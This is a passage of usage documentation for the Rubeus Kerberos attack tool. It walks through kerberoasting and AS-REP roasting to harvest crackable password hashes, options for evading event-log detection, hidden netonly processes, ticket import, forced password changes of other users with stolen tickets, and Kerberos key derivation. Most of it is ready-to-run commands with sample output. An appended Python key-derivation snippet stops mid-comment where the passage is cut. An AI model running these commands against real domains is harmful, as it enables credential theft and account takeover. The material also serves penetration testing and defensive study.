TGS-REQ requests, roast all accounts w/ RC4 specified\r\n/rc4opsec Use the tgtdeleg trick, enumerate accounts without AES enabled, roast w/ RC4 specified\r\n/aes Enumerate accounts with AES enabled, use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption\r\n/aes /tgtdeleg Use the tgtdeleg trick, enumerate accounts with AES enabled, roast w/ AES specified\r\n/pwdsetafter:X Use the supplied date and only enumerate accounts with password last changed after that date\r\n/pwdsetbefore:X Use the supplied date and only enumerate accounts with password last changed before that date\r\n/resultlimit:X Use the specified number to limit the accounts that will be roasted\r\n/nopreauth:USER Will send AS-REQs 
rather than TGS-REQs, which results in 4768 events instead of the 4769 events frequently monitored for kerberoasting detections\r\nExamples\r\nKerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest\r\nmethod:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Kerberoasting\r\n[*] SamAccountName : harmj0y\r\n[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\r\n[*] ServicePrincipalName : asdf/asdfasdf\r\n[*] Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)...\r\n[*] SamAccountName : sqlservice\r\n[*] DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local\r\n[*] ServicePrincipalName : MSSQLSvc/SQL.testlab.local\r\n[*] Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)...\r\n...(snip)...\r\nKerberoasting all users in a specific OU, saving the hashes to an output file:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\\Temp\\hashes.txt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Kerberoasting\r\n[*] Target OU : OU=TestingOU,DC=testlab,DC=local\r\n[*] SamAccountName : testuser2\r\n[*] DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local\r\n[*] ServicePrincipalName : service/host\r\n[*] Hash written to C:\\Temp\\hashes.txt\r\n[*] Roasted hashes written to : C:\\Temp\\hashes.txt\r\nPerform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose\r\npassword was last set between 01-31-2005 and 03-29-2010, returning up to 3 service 
tickets:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[*] Action: Kerberoasting\r\n[*] Using 'tgtdeleg' to request a TGT for the current user\r\n[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else\r\n[*] Searching the current domain for Kerberoastable users\r\n[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010\r\n[*] Up to 3 result(s) will be returned\r\n[*] Total kerberoastable users : 3\r\n[*] SamAccountName : harmj0y\r\n[*] DistinguishedName : CN=harmj0y,OU=TestOU,DC=theshire,DC=local\r\n[*] ServicePrincipalName : testspn/server\r\n[*] PwdLastSet : 5/31/2008 12:00:02 AM\r\n[*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96\r\n[*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)..\r\n[*] SamAccountName : constraineduser\r\n[*] DistinguishedName : CN=constraineduser,CN=Users,DC=theshire,DC=local\r\n[*] ServicePrincipalName : blah/blah123\r\n[*] PwdLastSet : 9/5/2009 7:48:50 PM\r\n[*] Supported ETypes : RC4_HMAC\r\n[*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)..\r\n[*] SamAccountName : newuser\r\n[*] DistinguishedName : CN=newuser,CN=Users,DC=theshire,DC=local\r\n[*] ServicePrincipalName : blah/blah123456\r\n[*] PwdLastSet : 9/12/2008 8:05:16 PM\r\n[*] Supported ETypes : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96\r\n[*] Hash : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)..\r\nList statistics about found Kerberoastable accounts without actually sending ticket requests:\r\nC:\\Rubeus\u003eRubeus.exe 
kerberoast /stats\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\nv1.5.0\r\n[*] Action: Kerberoasting\r\n[*] Listing statistics about target users, no ticket requests being performed.\r\n[*] Searching the current domain for Kerberoastable users\r\n[*] Total kerberoastable users : 4\r\n ----------------------------------------------------------------------\r\n | Supported Encryption Type | Count |\r\n ----------------------------------------------------------------------\r\n | RC4_HMAC_DEFAULT | 1 |\r\n | RC4_HMAC | 1 |\r\n | AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |\r\n | RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |\r\n ----------------------------------------------------------------------\r\n ----------------------------------\r\n | Password Last Set Year | Count |\r\n ----------------------------------\r\n | 2019 | 4 |\r\n ----------------------------------\r\nKerberoasting a specific user, with simplified hash output:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /user:harmj0y /simple\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[*] Action: Kerberoasting\r\n[*] NOTICE: AES hashes will be returned for AES-enabled accounts.\r\n[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.\r\n[*] Target User : harmj0y\r\n[*] Searching the current domain for Kerberoastable users\r\n[*] Total kerberoastable users : 1\r\n$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...\r\nKerberoasting all users in a foreign trusting domain, not line-wrapping the 
results:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /domain:dev.testlab.local /nowrap\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.5.0\r\n[*] Action: Kerberoasting\r\n[*] Target Domain : dev.testlab.local\r\n[*] SamAccountName : jason\r\n[*] DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local\r\n[*] ServicePrincipalName : test/test\r\n[*] Hash : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)...\r\nKerberoasting using an existing TGT:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:\"asdf/asdfasdf\" /dc:primary\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.5\r\n[*] Action: Kerberoasting\r\n[*] Using a TGT /ticket to request service tickets\r\n[*] Target SPN : asdf/asdfasdf\r\n[*] Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)...\r\n\"Opsec\" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /rc4opsec\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.6\r\n[*] Action: Kerberoasting\r\n[*] Using 'tgtdeleg' to request a TGT for the current user\r\n[*] Searching the current domain for Kerberoastable users\r\n[*] Searching for accounts that only support RC4_HMAC, no AES\r\n[*] Found 6 users to Kerberoast!\r\n[*] SamAccountName : harmj0y\r\n[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\r\n[*] ServicePrincipalName : asdf/asdfasdf\r\n[*] Supported ETypes : RC4_HMAC_DEFAULT\r\n[*] 
Hash : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...\r\nasreproast\r\nThe asreproast action replaces the ASREPRoast project which executed similar actions with the (larger sized)\r\nBouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be\r\nsuccessfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For\r\nmore technical information, see this post.\r\nJust as with the kerberoast command, if no other arguments are supplied, all user accounts that do not require\r\nKerberos preauthentication are roasted. The /user:X argument roasts just the specified user, and the /ou:X\r\nargument roasts just users in the specified OU. The /domain and /dc arguments are optional, pulling system\r\ndefaults as other actions do.\r\nThe /outfile:FILE argument outputs roasted hashes to the specified file, one per line.\r\nAlso, if you wanted to use alternate domain credentials for kerberoasting, that can be specified with\r\n/creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD.\r\nThe output /format:X defaults to John the Ripper (Jumbo version). 
/format:hashcat is also an option for the\r\nnew hashcat mode 18200.\r\nIf the /ldaps flag is used, any LDAP queries will go over TLS (port 636).\r\nAS-REP roasting all users in the current domain:\r\nC:\\Rubeus\u003eRubeus.exe asreproast\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target Domain : testlab.local\r\n[*] SamAccountName : dfm.a\r\n[*] DistinguishedName : CN=dfm.a,CN=Users,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 163 bytes\r\n[*] Received 1537 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)...\r\n[*] SamAccountName : TestOU3user\r\n[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\TestOU3user'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 169 bytes\r\n[*] Received 1437 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n$krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip)..\r\n[*] SamAccountName : harmj0y2\r\n[*] DistinguishedName : CN=harmj0y2,CN=Users,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\harmj0y2'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 166 bytes\r\n[*] Received 1407 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip)..\r\nAS-REP roasting all users 
in a specific OU, saving the hashes to an output file in Hashcat format:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfi\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target OU : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Target Domain : testlab.local\r\n[*] SamAccountName : TestOU3user\r\n[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\TestOU3user'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 169 bytes\r\n[*] Received 1437 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] Hash written to C:\\Temp\\hashes.txt\r\n[*] Roasted hashes written to : C:\\Temp\\hashes.txt\r\nAS-REP roasting a specific user:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /user:TestOU3user\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target User : TestOU3user\r\n[*] Target Domain : testlab.local\r\n[*] SamAccountName : TestOU3user\r\n[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\TestOU3user'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 169 bytes\r\n[*] Received 1437 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...\r\nAS-REP roasting all users in a 
foreign trusting domain:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /domain:dev.testlab.local\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target Domain : dev.testlab.local\r\n[*] SamAccountName : devuser3\r\n[*] DistinguishedName : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local\r\n[*] Using domain controller: dev.testlab.local (192.168.52.105)\r\n[*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\\devuser3'\r\n[*] Connecting to 192.168.52.105:88\r\n[*] Sent 175 bytes\r\n[*] Received 1448 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)...\r\nAS-REP roasting users in a foreign non-trusting domain using alternate credentials:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /domain:external.local /creduser:\"EXTERNAL.local\\administrator\" /credpassword:\"\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target Domain : external.local\r\n[*] Using alternate creds : EXTERNAL.local\\administrator\r\n[*] SamAccountName : david\r\n[*] DistinguishedName : CN=david,CN=Users,DC=external,DC=local\r\n[*] Using domain controller: external.local (192.168.52.95)\r\n[*] Building AS-REQ (w/o preauth) for: 'external.local\\david'\r\n[*] Connecting to 192.168.52.95:88\r\n[*] Sent 165 bytes\r\n[*] Received 1376 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...\r\nMiscellaneous\r\nBreakdown of the 
miscellaneous commands:\r\nCommand Description\r\ncreatenetonly Create a process of logon type 9\r\nchangepw Perform the Aorato Kerberos password reset\r\nhash Hash a plaintext password to Kerberos encryption keys\r\ntgssub Substitute in alternate service names into a service ticket\r\ncurrentluid Display the current user's LUID\r\nlogonsession Display logon session information\r\nasrep2kirbi Convert an AS-REP and a client key to a Kirbi (KERB_CRED)\r\nkirbi Manipulate Kirbi's (KERB_CRED)\r\ncreatenetonly\r\nThe createnetonly action will use the CreateProcessWithLogonW() API to create a new hidden (unless /show is\r\nspecified) process with a SECURITY_LOGON_TYPE of 9 (NewCredentials), the equivalent of runas /netonly.\r\nThe process ID and LUID (logon session ID) are returned. Specific Kerberos tickets can then be applied to this\r\nprocess with the ptt /luid:0xA.. parameter, assuming elevation. This prevents the erasure of existing\r\nTGTs for the current logon session.\r\nCreate a hidden upnpcont.exe process:\r\nC:\\Rubeus\u003eRubeus.exe createnetonly /program:\"C:\\Windows\\System32\\upnpcont.exe\"\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : False\r\n[+] Process : 'C:\\Windows\\System32\\upnpcont.exe' successfully created with LOGON_TYPE = 9\r\n[+] ProcessID : 9936\r\n[+] LUID : 0x4a0717f\r\nCreate a visible command prompt:\r\nC:\\Rubeus\u003eRubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" /show\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : 
True\r\n[+] Process : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\r\n[+] ProcessID : 5352\r\n[+] LUID : 0x4a091c0\r\nCreate a visible command prompt and import a ticket:\r\nC:\\Rubeus\u003eRubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" /show /ticket:ticket.kirbi\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : True\r\n[+] Process : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\r\n[+] ProcessID : 5352\r\n[+] LUID : 0x4a091c0\r\n[+] Ticket successfully imported!\r\nchangepw\r\nThe changepw action takes a user's TGT .kirbi blob and executes an MS kpasswd password change (port 464) with the\r\nspecified /new:PASSWORD value. If a /dc is not specified, the computer's current domain controller is extracted\r\nand used as the destination for the password reset traffic. This is the Aorato Kerberos password reset disclosed in\r\n2014, and is equivalent to Kekeo's misc::changepw function. The request is authenticated with the ticket, so only\r\nthe ticket and the new value are needed; the old password is never sent.\r\nThe /targetuser argument can be used to change the password of other users, provided the user whose TGT is\r\nsupplied has sufficient privileges. 
The format required is domain.com\\user.\r\nNote that either a user's TGT or a service ticket for kadmin/changepw can be used to change the password.\r\nYou can retrieve a TGT blob using the asktgt command.\r\nC:\\Rubeus\u003eRubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123!\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Reset User Password (AoratoPw)\r\n[*] Changing password for user: harmj0y@TESTLAB.LOCAL\r\n[*] New password value: Password123!\r\n[*] Building AP-REQ for the MS Kpassword request\r\n[*] Building Authenticator with encryption key type: rc4_hmac\r\n[*] base64(session subkey): nX2FOQ3RsGxoI8uqIg1zlg==\r\n[*] Building the KRV-PRIV structure\r\n[*] Connecting to 192.168.52.100:464\r\n[*] Sent 1347 bytes\r\n[*] Received 167 bytes\r\n[+] Password change success!\r\nChanging the password of another user (dev.ccob@dev.rubeus.ghostpack.local) with a service ticket for\r\nkadmin/changepw retrieved using a referral TGT for harmj0y@rubeus.ghostpack.local:\r\nC:\\Rubeus\u003eRubeus.exe changepw /targetuser:dev.rubeus.ghostpack.local\\dev.ccob /new:Pwn3dPassword123! 
/ticket:do\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Reset User Password (AoratoPw)\r\n[*] Using domain controller: DevDC1.dev.rubeus.ghostpack.local (192.168.71.85)\r\n[*] Resetting password for target user: dev.rubeus.ghostpack.local\\dev.ccob\r\n[*] New password value: Pwn3dPassword123!\r\n[*] Building AP-REQ for the MS Kpassword request\r\n[*] Building Authenticator with encryption key type: aes256_cts_hmac_sha1\r\n[*] base64(session subkey): wCAQoKiWlCjeEjfmqo+aA7ZlLSXYWhv+LzlXkGVJSXU=\r\n[*] Building the KRV-PRIV structure\r\n[+] Password change success!\r\nhash\r\nThe hash action takes a /password:X and optional /user:USER and/or /domain:DOMAIN. It generates\r\nthe rc4_hmac (NTLM) representation of the password using @gentilkiwi's kerberos:hash (KERB_ECRYPT\r\nHashPassword) approach. If user and domain names are specified, the aes128_cts_hmac_sha1,\r\naes256_cts_hmac_sha1, and des_cbc_md5 hash forms are generated as well. The upper-cased domain name followed by the\r\ncase-sensitive username is the salt for the AES and DES key derivations (printed as Salt in the output), so unlike\r\nrc4_hmac these keys differ between accounts even when the password is the same.\r\nCalculating the rc4_hmac of a password:\r\nC:\\Rubeus\u003eRubeus.exe hash /password:Password123!\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.0\r\n[*] Action: Calculate Password Hashes\r\n[*] Input password : Password123!\r\n[*] rc4_hmac : 2B576ACBE6BCFDA7294D6BD18041B8FE\r\n[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!\r\nCalculating all hash formats:\r\nC:\\Rubeus\u003eRubeus.exe hash /password:Password123! 
/user:harmj0y /domain:testlab.local\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.0\r\n[*] Action: Calculate Password Hashes\r\n[*] Input password : Password123!\r\n[*] Input username : harmj0y\r\n[*] Input domain : testlab.local\r\n[*] Salt : TESTLAB.LOCALharmj0y\r\n[*] rc4_hmac : 2B576ACBE6BCFDA7294D6BD18041B8FE\r\n[*] aes128_cts_hmac_sha1 : B0A79AB550536860123B427C14F2A531\r\n[*] aes256_cts_hmac_sha1 : F7FEBF9779401B653911A56A79FF9E3A58F7F8990FDB3D9CA0E89227ABF13287\r\n[*] des_cbc_md5 : 614589E66D6B3792\r\ntgssub\r\nThe tgssub action will take a service ticket base64 blob/file specification and substitute an alternate service name\r\ninto the ticket. This is useful for S4U abuse and other scenarios. It works because the sname sits in the unencrypted\r\npart of the ticket: the service validates the ticket by decrypting it with its own long-term key and never compares the\r\nsname against anything inside the encrypted part, and every SPN registered on one account shares that key. The\r\nsubstituted SPN must therefore belong to the account whose key encrypted the ticket.\r\nThe /altservice:X argument is required and can either be a standalone sname (ldap, cifs, etc.) or a full service\r\nprincipal name (cifs/computer.domain.com). The former keeps the host part of the existing sname and replaces only the\r\nservice class (ldap/PRIMARY.testlab.local becomes cifs/PRIMARY.testlab.local). The latter replaces the whole sname and is\r\nneeded in some S4U2self abuse scenarios with resource-based constrained delegation, where the ticket's sname is a bare\r\naccount name such as primary$. See Elad Shamir's post on the topic for more information.\r\nThe /srealm:Y argument is optional and can be used to change the service realm within the ticket.\r\nThe /ptt flag will \"pass-the-ticket\" and apply the resulting Kerberos credential to the current logon session. The\r\n/luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current\r\nlogon session.\r\nExecuting the S4U2self/S4U2proxy process to abuse traditional constrained delegation and then substituting the sname in\r\nthe final ticket means the S4U process does not have to be run a second time for another service on the same host.
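Before the tgssub walkthrough, a closer look at the hash action above, as an added example that is not Rubeus code: it rebuilds the values in that output from the page's inputs (Password123!, harmj0y, testlab.local) and shows that rc4_hmac is the unsalted NT hash, MD4 over the UTF-16LE password, while the AES keys put the UTF-8 password through PBKDF2-HMAC-SHA1 with the upper-cased realm plus the case-sensitive username as the salt (the Salt line in the output) and then through the DK step of RFC 3962. MD4 is written out in full because hashlib's md4 is disabled in many OpenSSL 3 builds; the DK step needs an AES primitive, so it runs only when the third-party cryptography package is installed and returns None otherwise. The second account name, ghost, is made up for the comparison.

```python
# Added example, not Rubeus code: rebuild the keys that the hash action prints
# from the page's inputs, to show exactly where the salt enters.
#   rc4_hmac  = MD4(UTF-16LE(password))                                (no salt)
#   aesN_cts  = DK(PBKDF2-HMAC-SHA1(UTF-8 password, salt, 4096), nfold('kerberos'))
#   salt      = REALM.upper() + sAMAccountName, case of the name preserved
# MD4 is spelled out because hashlib.new('md4') is disabled in many OpenSSL 3
# builds. The DK step needs an AES primitive, so it runs only when the
# third-party cryptography package is installed and returns None otherwise.
import hashlib
import struct

try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_AES = True
except ImportError:
    HAVE_AES = False

MASK = 0xFFFFFFFF
PBKDF2_ROUNDS = 4096  # iteration count Active Directory uses for AES keys
# 128-bit n-fold of the ASCII string 'kerberos' (RFC 3961, appendix A.1).
NFOLD_KERBEROS = bytes.fromhex('6b65726265726f737b9b5b2b93132b93')
R3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def md4(data: bytes) -> bytes:
    # RFC 1320: three rounds of sixteen steps per 64-byte block, little-endian words.
    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack('<Q', len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack('<16I', bytes(msg[off:off + 64]))
        a, b, c, d = a0, b0, c0, d0
        for i in range(48):
            j = i % 16
            if i < 16:
                val, k, s = f(b, c, d), j, (3, 7, 11, 19)[j % 4]
            elif i < 32:
                val, k, s = g(b, c, d) + 0x5A827999, (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4]
            else:
                val, k, s = h(b, c, d) + 0x6ED9EBA1, R3_ORDER[j], (3, 9, 11, 15)[j % 4]
            # One register changes per step; rotating the tuple reproduces the
            # A, D, C, B update order of the specification.
            a, b, c, d = d, rotl((a + val + x[k]) & MASK, s), b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK, (b0 + b) & MASK,
                          (c0 + c) & MASK, (d0 + d) & MASK)
    return struct.pack('<4I', a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    # rc4_hmac key is the NT hash; no salt, so equal passwords give equal keys.
    return md4(password.encode('utf-16-le'))


def kerberos_salt(realm: str, username: str) -> str:
    # Default AD salt for user accounts, printed by Rubeus as 'Salt : ...'.
    return realm.upper() + username


def aes_tkey(password: str, realm: str, username: str, key_len: int) -> bytes:
    # First stage of RFC 3962 string-to-key: 16 bytes for aes128, 32 for aes256.
    salt = kerberos_salt(realm, username).encode('utf-8')
    return hashlib.pbkdf2_hmac('sha1', password.encode('utf-8'), salt,
                               PBKDF2_ROUNDS, key_len)


def aes_string_to_key(password: str, realm: str, username: str, key_len: int):
    # Second stage, DK(tkey, 'kerberos'): K1 = E(tkey, nfold), K2 = E(tkey, K1),
    # key = (K1 || K2)[:key_len]. CBC-CTS of one full block with a zero IV is a
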